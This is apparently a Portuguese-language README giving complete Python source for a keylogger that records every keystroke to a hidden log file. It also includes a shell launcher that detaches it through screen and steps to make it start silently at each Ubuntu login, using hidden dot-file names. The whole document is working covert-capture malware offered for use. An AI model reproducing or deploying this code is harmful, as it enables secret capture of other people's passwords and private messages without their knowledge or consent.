# Felipe Tanii
----- Instalar os pacotes:
$ sudo apt install python3-pip
$ pip3 install pynput
$ sudo apt intall screen 
- A seguir substitua "sp" pelo nome da sua pasta de usuario!
$ cd /home/sp 
$ nano .kllgr.py 
------ Copie e cole no nano com shit+ctrl+v (antes altere o nome da pasta sp)
# Felipe Tanii 2020 12 1
from pynput.keyboard import Listener
import re
arquivoLog = '/home/sp/.kllgr.log' # pasta de usuario
def capturar(tecla):
    tecla = str(tecla)
    tecla = re.sub(r'\'', '', tecla)
    tecla = re.sub(r'Key.', ' ', tecla)
    tecla = re.sub(r'space', '', tecla)
    tecla = re.sub(r'back', '<-', tecla)
    tecla = re.sub(r'enter', '\n', tecla)
    tecla = re.sub(r'shift', '', tecla)
    with open(arquivoLog, 'a') as log:
        log.write(tecla) 
with Listener(on_press=capturar) as l:
    l.join() 
----------------------------------------
- ctrl+o para salvar
- Enter
- ctrl+x para sair
$ nano .kllgr.sh
------ Copie e cole no nano com shit+ctrl+v (antes altere o nome da pasta sp)
#!/bin/sh
# Felipe Tanii 2020 12 1
python3 /home/sp/.kllgr.py &   # pasta de usuario
screen &&
exit
----------------------------------------
- ctrl+o para salvar
- Enter
- ctrl+x para sair
$ chmod +x .kllgr.sh     (o torna executavel)
-------------------- Para executar ao iniciar -----------------------
----------------------------------------
- Nos aplicavos do ubuntu busque “Alipcativos iniciais de sessao”.
- Em adicionar, navegar adicione /home/~/.kllgr.sh 
- Nomeie como kllgr e reinicie
- O arquivo esta oculto em .kllgr.log na sua pasta de usuario
- ctrl + h para visualizar arquivos ocultos
----------------------------------------

------------------ OU -----------------------------------------------

------ Usar o kllgr sem reiniciar ou adidcionar na inicializacao
- No terminal:
$ screen	(abre primeira sessao)
(tap space)
$ python3 .kllgr.py &		(Executa & libera)
$ screen &&					(Abre nova sessao)
(close terminal)
$ ps ax | grep .kllgr.py	(ver se executando)
$ kill (numero do PID)		(mata o processo)(desliga o kllgr)
----------------------------------------





